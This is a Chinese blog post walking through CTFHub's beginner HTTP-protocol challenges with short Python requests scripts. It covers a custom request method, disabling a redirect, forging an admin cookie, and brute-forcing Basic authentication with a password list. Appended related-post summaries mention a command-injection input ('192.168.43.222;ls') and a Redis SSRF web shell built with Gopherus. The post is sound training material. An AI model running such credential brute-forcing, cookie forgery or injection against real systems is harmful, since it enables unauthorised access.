ctfhub技能树---http协议

已于 2022-09-13 17:59:41 修改
阅读量757 收藏 2
点赞数 1
分类专栏: ctf 文章标签: http php python
于 2022-09-13 17:37:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43216252/article/details/126836442
版权

闲来无事,用python写了一下,代码都很简单
ctfhub链接:CTFHub

http协议实验目录

请求方式

他说要用方法CTFHUB,那就直接自定义个方法就可以了

# #请求方式
import requests

url = 'http://challenge-25a50f993babac1c.sandbox.ctfhub.com:10800/index.html' #改成你的url
res = requests.request('CTFHUB', url)
print(res.text)

详细用法请参考:requests.request方法
在这里插入图片描述

302跳转

我的理解就是他会index.html->index.php->index.html,我们可以直接禁止重定向,就到了index.php就不跳转了,所以可以直接用requests中的allow_redirects=False

# 302跳转
import requests

res = requests.get('http://challenge-ef315930cafffdad.sandbox.ctfhub.com:10800/index.php', allow_redirects=False)#改成你的网址/index.php,然后不让他重定向就可以了
print(res.text)

详细用法请参考:requests重定向
在这里插入图片描述

Cookie

直接F12看他的request headers
在这里插入图片描述
盲猜admin=1就可以了,那直接试一试:

# cookie
import requests

url = 'http://challenge-248159ff10251d08.sandbox.ctfhub.com:10800/'  # 改成你自己的url
cookies = {'admin': '1'}
res = requests.get(url, cookies=cookies)
print(res.text)

详细内容:requests的Cookie
在这里插入图片描述

基础认证

在这里插入图片描述
click就跳转到:
在这里插入图片描述
然后他还给了个密码本:
在这里插入图片描述
但没给用户名啊,只能盲猜admin啊,不行就拉倒。
![在这里插入图片描述](https://img-blog.csdnimg.cn/e1c06e0d4a444493beb3e6e18298104c.png
你看,还给了提示,do u know admin
那直接遍历密码本就可以了

# 基础认证
import requests

url = 'http://challenge-cf5a0467fb24a0ae.sandbox.ctfhub.com:10800/flag.html'#改成你自己的url
pwd_list = []
with open('10_million_password_list_top_100.txt', 'r') as f:
    for pwd in f.readlines():
        # pwd_list.append(line)#别用+=,这样他们就变成很多个字符了,而不是一个个字符串,你可以试一试
        pwd = pwd.strip()  # 因为每个字符串都有\n,所以要去掉
        res = requests.get(url, auth=('admin', pwd))
        if res.status_code == 200:
            print(pwd, res.text)
            break
#输出iloveyou ctfhub{f489a1454de438148d22b46a}
#注意,每次的密码和flag都不一样的!

详细内容:requests基础认证
在这里插入图片描述

响应包源代码

本能地F12,然后flag就在里面??
在这里插入图片描述
啊这,那就画蛇添足吧

# 响应包源代码
import requests

url = 'http://challenge-51d50ef13e470ee2.sandbox.ctfhub.com:10800/'
res = requests.get(url)
print(res.text)

然后在输出里面 ctrl+f查找ctfhub就会找到了。
在这里插入图片描述
当然了,眼神好,也可以找一找,就在body下面一行,不过何必呢?直接F12不香吗?

附上requests官方文档链接:requests官网文档

以上。

欲买桂花同载酒终不似少年游
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
ctfhub技能树_web_web前置技能_HTTP
YanLucyqi的博客
11-28 1941
POST请求可能会导致新的资源的建立和/或已有资源的修改。重定向的返回码3XX说明。(7)点击Repeater,修改target(其中Host为网址的ip地址,Port为网址的端口号),并将内容粘贴进Request的Raw去。(7)点击Repeater,修改target(其中Host为网址的ip地址,Port为网址的端口号),并将内容粘贴进Request的Raw去。(7)点击Repeater,修改target(其中Host为网址的ip地址,Port为网址的端口号),并将内容粘贴进Request的Raw去。
CTFHUB技能树--web前置--HTTP协议(入门级详细wp)
weixin_58391382的博客
10-23 497
本文仅记录本人自己写ctfhub技能树的过程,仅供参考,如有错误还请大佬在评论区指正 目录 请求方式 302跳转 Cookie 基础认证 请求方式 先看下题目要求 翻译一下: HTTP方法是GET 使用CTF**B方法,我会给你标志。 提示:如果您得到“HTTP方法不允许”错误,您应该请求index.php。 直接根据提示brup抓包更改头部即可 302跳转 打开后界面 翻译一下: 这里 没有flag 给我flag ...
网安萌新必看CTFHUB技能树HTTP协议(胎教级教程)
qq_64948897的博客
07-10 1067
网安萌新必看,ctf入门题解
CTFHub:web前置技能-HTTP协议-基础认证篇
最新发布
wdnmddbl的博客
06-06 908
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:Basic 认证原理Basic 认证是HTTP协议支持的最简单形式的身份验证机制。它的原理基于“用户名:密码”的凭据,通过HTTP头部进行传输。具体来说,当用户尝试访问一个需要认证的资源时,服务器会返回一个401 Unauthorized响应,同时在响应头中包含WWW-Authenticate字段,提示客户端需要提供认证信息。用户提供的用户名和密码将按照以下格式组合:username:password。
CTFHub技能树 Web-前置技能-HTTP协议
weixin_45808483的博客
11-16 535
请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 启动环境 使用CTFHUB请求方法后,会提供flag 我们使用curl命令 因为 它可以指定我们想要的请求方式 curl windows自带命令 -v是详细信息,-X是指定请求方法 302跳转 HTTP临时重定向 点击Give me Flag后抓包,将index.html 改为 index.php 或者 使用curl 命令 -i, --include ...
CTFHub 技能树web HTTP协议
qq_61768489的博客
01-21 3686
目录 请求方式 302跳转 基础认证 Cookie 响应包源代码 ​ 请求方式 告诉我们用 CTF**B 的方式来请求 应该就是CTFHUB 抓包 修改 请求方式 302跳转 点击 GIve me Flag 时候抓包就出来了 但是这样写与题目的302跳转就没什么关系 看了一下其他方式: 302是Http协议的临时重定向状态码, 按f12进入控制台,点击Give me Flag按钮,发现页面没有任何变化, 但其实页面已经发生了跳转,用curl访问新的跳转..
CTFHUB:技能树 | HTTP协议 | 请求方式
山兔的博客
04-16 339
title: 请求方式 description: 技能树 | HTTP协议 | 请求方式 题目考点 burp的使用(Intercept is off表示关闭了拦截模式, Intercept is on表示开启了拦截模式,如果开启了这个,页面就不能访问) 请求方式 解题思路 1.打开题目网站的时候,把地址复制黏贴到火狐浏览器打开,打开火狐浏览器点击选项 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-humckL50-1618580694865)(C:\Users\HQ.
CTFHub Web前置技能 http协议
liver100day的博客
10-08 395
CTFHub Web前置技能 http协议 1.请求方式 在做这道题之前,我们需要先了解一下前置的知识,理解http协议中的八种基础请求方式,其中最重要最常见的为:GET和POST 1、OPTIONS 返回服务器针对特定资源所支持的HTTP请求方法,也可以利用向web服务器发送‘*’的请求来测试服务器的功能性 2、HEAD 向服务器索与GET请求相一致的响应,只不过响应体将不会被返回。这一方法可以再不必传输整个响应内容的情况下,就可以获取包含在响应小消息头中的元信息。 3、GET 向特定的资源发出请求。注意
CTFHUB技能树-SSRF-redis协议踩坑
u011250160的博客
01-03 593
在gopherus上面输入命令:python gophers.py --exploit redis。虽然蚁剑连接不上但可以用url+shell?cmd=ls / 获取flag。然后文件名过长好像是被截断导致文件后缀少了一个p。如果是get传参需要再进行一次url编码。将自动生成的代码url解密可以得到。文件名最好还是用shell.php。我测试了s.php但文件没内容。接下来看可以连接蚁剑的代码。system修改为eval。
CTFHUB-WEB前置技能-HTTP协议-基础认证
K_ShenH的博客
06-09 1160
CTFHUB-WEB前置技能-HTTP协议-基础认证
CTFHUB-WEB前置技能-HTTP协议-Cookie
K_ShenH的博客
06-09 832
CTFHUB-WEB前置技能-HTTP协议-Cookie
CTFHuB-技能树-Web前置技能-HTTP协议
YatKTm的博客
11-17 1824
文章目录1.请求方式1.1先了解一下http协议1.2http请求方法 1.请求方式 1.1先了解一下http协议 HTTP,即超文本传输协议,是一种实现客户端和服务器之间通信的响应协议,它是用作客户端和服务器之间的请求。HTTP默认使用80端口,这个端口指的是服务端的端口,而客户端使用的端口是动态分配的。当我们没有指定端口访问时,浏览器会默认帮我们添加80端口。 客户端(浏览器)会向服务器提交HTTP请求;然后服务器向客户端返回响应;其中响应包含有关请求的状态信息,还可能包含请求的内容。 1.2http
CTFHUB HTTP协议
qq_49422880的博客
03-25 235
CTFHUB HTTP协议0x01 明文爆破 0x01 明文爆破 直接页面在页面上进行爆破,根据状态码的结果判断是否登录进去 #! /usr/bin/env python3 # _*_ coding:utf-8 _*_ import base64 # 字典文件路径 dic_file_path = 'E:\BUU_MISC2\ctfhub\\10_million_password_list_top_100.txt' import requests username='admin' with open(d
CTFHub技能树http协议 writeup
qq_45653588的博客
07-22 657
0X00 请求方式 首先进去看见提示说http请求方式,使用CTFXXB方式,就可以得到flag。 于是使用burp抓包,将请求头的GET改为CTFHUB,发送 响应内容里面得到了flag。 0X01 302跳转 首先进去看见界面,结合标题,点击链接重定向回index.html。 在这可以使用curl查看,curl 命令是支持请求重定向的,可以通过 -L 参数配置,直接得到flag。 这题也可以使用burp抓包,发送得到flag。 0X02 Cookie欺骗、认证、伪造 第三题进去后,提示说只有
CTFHUB技能树HTTP协议
winofkill的博客
11-21 4876
ctfhub技能树http协议,请求方式,302跳转,cookie,基础认证,响应包源代码
CTFHub-技能树-HTTP协议-请求方式
pakho_C的博客
02-20 1595
打开靶场 得到提示,如果请求方法为CTFHUB,那么会得到flag 使用burp抓包进行修改GET为CTFHUB,得到flag 方法二: 可以使用curl命令进行指定方式的请求 curl 命令详解 payload: curl -v -X CTFHUB 网址 -v表示输出信息 -X表示使用指定的方式请求目标网站 ...
CTFHub--HTTP协议
qq_40730029的博客
04-10 559
CTFHub练习题 1.请求方式 题目:HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 在linux的终端使用如下命令即可显示flag curl -v -X CTFHUB http://challenge-2b5da3d53c130a9e.sandbox.ctfhub.com:10080/index.php -v是显示详细信息,-x是请求方式...
CTFHUBHTTP协议-cookie
keaidxxn的博客
04-19 438
点击cookie: 点击开启题目后,再在显示的页面里点击相关链接: 点击链接之后显示出以下网页信息: 因为这里提示只有admin可以拿到flag,并且这道题的名字为cookie,于是F12,查看相关信息: 在cookie里找到一个admin,发现它 的value值为0,于是把0改为1,并且刷新一下页面: 成功拿到flag了!!! ...
CTFHub-技能树-HTTP协议-基础认证
pakho_C的博客
02-20 2085
打开靶场 点击click 需要登录,下载题目给的附件解压得到一个密码字典文件 显然需要我们爆破密码 先点击click抓包观察返回包有无提示信息 那么猜测用户名为admin 这里的思路可能有点问题,没有找到爆破的地方,经过几次输入之后,查看burp的流量检测,找到一个登录失败的页面查看 这里像是base64加密后的字符,解密查看 正是我刚才输入的用户名和密码 结合刚才的字典,明显要进行爆破,并且要将字典中的数据进行base64加密,这样才能符合它的规则,发送到burp的intruder模块进行爆.
CTFHub 命令注入-无过滤
07-25
CTFHub 命令注入-无过滤是一个题目,它的源代码中存在一个命令注入漏洞。在这个题目中,用户可以通过输入IP地址执行ping命令。\[1\]由于没有采用过滤,用户可以直接进行命令拼接,例如输入"192.168.43.222;ls"可以查看目录下的全部文件。\[2\]在这个题目中,flag被隐藏在网页源代码中。\[3\]为了防止命令注入漏洞,可以对用户输入进行过滤,例如过滤空格。 #### 引用[.reference_title] - *1* *2* [CTFHub -技能树 命令注入-无过滤](https://blog.csdn.net/qq_45653588/article/details/107556087)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFhub——命令执行](https://blog.csdn.net/qq_43277152/article/details/113649643)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值